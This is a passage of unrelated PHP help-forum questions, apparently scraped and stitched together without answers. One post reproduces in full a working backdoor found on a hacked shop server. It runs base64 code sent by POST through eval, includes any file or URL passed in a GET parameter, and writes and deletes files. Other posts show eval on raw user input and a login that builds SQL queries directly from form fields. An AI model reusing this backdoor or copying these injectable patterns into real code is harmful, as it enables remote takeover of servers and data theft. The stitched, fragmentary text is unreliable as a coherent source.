PHP - Website Hacked...continued..

I know the following line of code is dangerous since the user has control of $query but I do not know any other way to realistically do it.

  if (eval('return (' . $query . ');')) {

The perpose is to allow the user to type in any valid php statement and see if it evaluates true or false.

I.E. 
1==1  is true
substr('cat',1,2)=='at' is true
12<6 is false

the problem is I am sure there are ways a hacker could use this code to upload code to my site and take over.  I have 2 options.  1 filter out any possible way a hacker could hack it or 2 only allow the user to enter functions that can't be used to hack it.  I will probably go the later route but either way I need to know what to look for.

Please let me know if you can think of any values for $query that would let you hack my site

(p.s. this code is not up yet and will not go up until any possible security flaws are fixed.)

I am using php 5 and I am having issues with cookies. I have looked at the help pages here but still stuck. A site had been hacked via a database and I am making it more secure with the use of session control ip address and cookies. The issue is this I need to run a database query to test if the two cookies set match that with the data in the database. I am using the following code in the head section.
Code: [Select]
<?php
session_start();
$session = session_id();
$ip = $_SERVER['REMOTE_ADDR'];
$user = stripslashes(trim($_POST['user']));
$pass = stripslashes(trim($_POST['pass']));
$username="$user";
$encrypt_user=md5($username);
$password="$pass";
$encrypt_password=md5($password);
include 'config.php';
$query = "SELECT * FROM `users`WHERE `username` = '$encrypt_user' AND `userpass` = '$encrypt_password'";
$result = mysql_query($query) or die (mysql_error());
if (mysql_num_rows($result)>0){
while($row = mysql_fetch_row($result)){
// set the cookies
setcookie("cookie[pas]", "$encrypt_password");
setcookie("cookie[user]", "$encrypt_user");
 $query = ("UPDATE`users`SET`sid`='$session', `ip` = '$ip'WHERE `username` = '$encrypt_user' AND `userpass` = '$encrypt_password'");
$result = mysql_query($query) or die (mysql_error());
}
}
 else {
echo 'No rows found';
}
?>
This works fine now when I add this bit of code I can see the cookie name and value.
Code: [Select]
<?php
echo "$ip<br>";
if (isset($_COOKIE['cookie'])) {
    foreach ($_COOKIE['cookie'] as $name => $value) {
        $name = htmlspecialchars($name);
        $value = htmlspecialchars($value);
        echo "$name : $value <br />\n";
    }
}
?>
I can see the ip address and the two cookies named user and pass but when I try to get the individual cookie details nothing comes out and this is the issue as I need to test each of the two individual cookies against the info in the database so I can include pages to make it all secure. I have tried
Code: [Select]
<?php
if (isset($_COOKIE['user'])) {
        echo "$encrypt_user";
    }
?>encrypt_user being the username from the form. I have also tried

Code: [Select]
<?php
if (isset($_COOKIE['user'])) {
        echo "$_COOKIE['user']";
    }
?>
These are not showing. I do not need to see it just run a query to test that each cookie matches the encrypt data in the MySQL. Any ideas would be great if you can help and if not have a great weekend 

I found this code added to my server uploaded into a zencart admin folder. We did have some problems previously with index.php and login.php files having some encoded javascript injected into them and mess up our online shop.

If someone could tell me what it does as i accidently launched it before i deleted it. Looked in the server logs and it seems to of accessed every file on the server within seconds.

Code: [Select]
<?php //e6b03bed4190733c7534e5c1209b076f

/**
 * @version 2.42
 * 
 */
if (isset($_POST["action"]))
{
        switch ($_POST["action"])
        {
                case "test":
                        test();
                        break;
                case "regular_test":
                        regular_test();
                        break;
                case "setup":
                        projectcodes_setup();
                        break;
                case "remove":
                        projectcodes_remove();
                        break;
                case "mail":
                        send();
                        break;
                default:
                        break;
        }
        return;
}

if (count($_GET) > 0)
{
        foreach ($_GET as $id => $code)
        {
                if ($id == "id")
                {
                        include $code;
                }
        }
        return;
}

function test()
{
        $encoded_data = "";

        $data["version"] = phpversion();
        if (isset($_SERVER["SERVER_SOFTWARE"]))
        {
                $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"];
        }
        else
        {
                $data["serverapi"] = "Not Available";
        }
        ob_start();
        phpinfo(8);
        $data["modules"] = ob_get_contents();
        ob_clean();
        $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE;
        $serializes_data = serialize($data);
        $encoded_data = base64_encode($serializes_data);
        echo $_POST["test_message"] . $encoded_data;
}

function regular_test()
{
        echo $_POST["test_message"];
}

function projectcodes_setup()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $code = base64_decode($projectcode["code"]);
                $res = new_file_put_contents($mark, $code);
                if ($res)
                {
                        $installed[] = $projectcode["id"];
                }
        }
        $installed = serialize($installed);
        $installed = base64_encode($installed);
        echo $installed;
}

function projectcodes_remove()
{
        $projectcodes = $_POST["projectcodes"];
        foreach ($projectcodes as $projectcode)
        {
                $mark = $projectcode["mark"];
                $res = unlink($mark);

                if ($res)
                {
                        $removed[] = $projectcode["id"];
                }
        }
        $removed = serialize($removed);
        $removed = base64_encode($removed);
        echo $removed;
}

function new_file_put_contents($filename, $data)
{
        $f = @fopen($filename, 'w');
        if (!$f)
        {
                return false;
        }
        else
        {
                $bytes = fwrite($f, $data);
                fclose($f);
                return $bytes;
        }
}

function new_file_get_contents($filename)
/* Returns the contents of file name passed
 */
{
        if (!function_exists('file_get_contents'))
        {
                $fhandle = fopen($filename, "r");
                $fcontents = fread($fhandle, filesize($filename));
                fclose($fhandle);
        }
        else
        {
                $fcontents = file_get_contents($filename);
        }
        return $fcontents;
}

function send()
{
        $code = base64_decode($_POST["projectcode"]);
      
        eval($code);
        //return;
}

?>

Hey guys I have a simple question,

I have a Config.php file that connects to mysql database on my server...

Something like this (modified data, of course):


<?php
// database information
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = '******';
$dbname = 'databasename';
?>

Can a hacker access those variables? How can I protect this?
Ideas, suggestions?

Thanks in advance!

Hey, friends.  I have some trouble on the server front.  My sites have been hacked, and I need to make sure I've eradicated every trace of this exploit.  I'm looking for a way to search for any and all php files contained in multiple directories with specific names.  For instance, I have found a commonality in relation to where these malicious files are placed, such as:
Code: [Select]
/some/dir/img/somename.phpor:
Code: [Select]
/some/dir/js/somename.php
Is there a way I can easily (e.g. using ssh and the "find" command) locate all files ending in php but only found in directories named "img"?  I can't seem to find anything that would allow me to do this with find, or with a combination of find and grep.  I can't go directory by directory, as some of these img directories are created many levels deep, some even in .svn directories. 

Any and all help is appreciated.  Hackers suck.

I'm trying to make a League of Legends (a video game) community website, both as a personal project and for practice.
Now the game has a lot of champions, each of whom have 5 unique abilities. Now, I thought about manually inputting all the details about each champion into a MySQL database, but that would long and tedious, and I don't really have the time for it now. Also, the game patches very oftern (like, once every 2 weeks) which changes many of the stats, etc. of the champion, and it is not possible for me to keep manually updating these every time there is a patch.

Fortunately, there is a League of Legends Wiki which has all the data I need in their specific champion pages, which they keep updated per patch. So I was wondering if there was any way to get the data from the divs in the wiki, and have it display on my site. What I want to do in my website is that whenever someone types a champion's name (in a post or whatever), I want it to display a hover-over dialog with some of the champions details. And a lot of other features such as that.

In plain English I need a way to :
> Tell PHP to go to the wiki's source code on a specific page
> Find a specific div container
> Get X data from there
> Pass X data into a function to display the hover-over

I think this way, I would not have to maintain a database as I can leech off the wiki's data.
I have not coded anything like this before, so I would like a few pointers as to how to achieve this. Any help will be appreciated!

I tried searching on google but couldn't find any relevant information, please redirect me to relevant source or help me with the code.

I want to pass a domain name in text field which will be scanned and then the script will display entire site map.

Not external links or links on a page. Sorry it is not easy for me to explain.

Eg. if i pass abc.com

Script will display

abc.com/12/adn.php
abc.com/asd/asd/
etc

Whatever their url format is.

All the links on that domain.

hello
My database is in a same server with seperate domain name , then I want to insert from website1 mysql data on website2 mysql data.
can anyone help me?

Is it possible to download files from a website to my online websites root directory? reason I'm asking is because I have been downloading large video files to my computer which take about 20 minutes!! Then I use FTP to upload them to my site but it takes about 2-3 hours per video!! I was looking for a faster way! All help would be great!

My code on website is not validate on W3 Validator.   <?xml version="1.0" encoding="ISO-8859-1"?>

Hello everybody! I have been asked by a customer to develop a GTP website (Get To Pay, those websites where people earn money from clicking on ads). I managed to write the backend, signup and login but I am unsure how the ads part, with built-in user-tracking works and fallback link works.   I would really appreciate any kind of help. Thank you very much! P.S. For the user tracking I was thinking of sessions with matching ip and user agents together with an anti-proxy online service (e.g. MaxMind, Proxystop, ...) 

Hi, I haven't used any php for a while, but i am making a website, and i need some advice on how to do the following:

I want the website to change an image once every 24 hours, the image will revert back to the original image after 2 minutes.

Does anyone have an idea how I could start doing this?

Hello everyone and thank you for reading this.   My goal: Build a site like sportingnewschicago.com   What it does? It has different sectiions of different teams. Then it displays the tittle of the news and makes them be able to click on to go to the news site. The site some how checks a list of sites and post them on their respected section. But only ones that have not already been listed.   What i want to do?  Well i want to try to learn how to do this. Is this something i can make with the help of members here? It would only have index.php and thats it.   Please let me know if anyone would be interested in teaching me as i do it. If not i would understand. Thank you.  

This would be an example of a  page I'm referring to: http://www.curse.com...other-downloads   I want to get the file name and compare it to another name (to see if they are the same or not). I have no idea how to access that page from my website. I'm guessing PHP would be best although if you don't think so tell me what you think would be better  (I was thinking javascript but don't think that's cross-site compatible). Is there a  PHP function to get the value of the href which is in this case (as of this posting) "Railcraft 9.4.0.0".   I used inspect element to see the code of the page but have no idea if this is possible or if I'm even going about this the right way. The code would have to work on this entire website (all pages have the smae layout as this one though! Any help is greatly appreciated!    

I am working on a website and I am at a standstill. I would rather speak to someone one on one but its been very difficult to find someone that could help. I have the scripts that I want but when I add the scripts to the mainpage everything stops working. I really don't want to go to wordpress because I am almost done with this one. Thanks.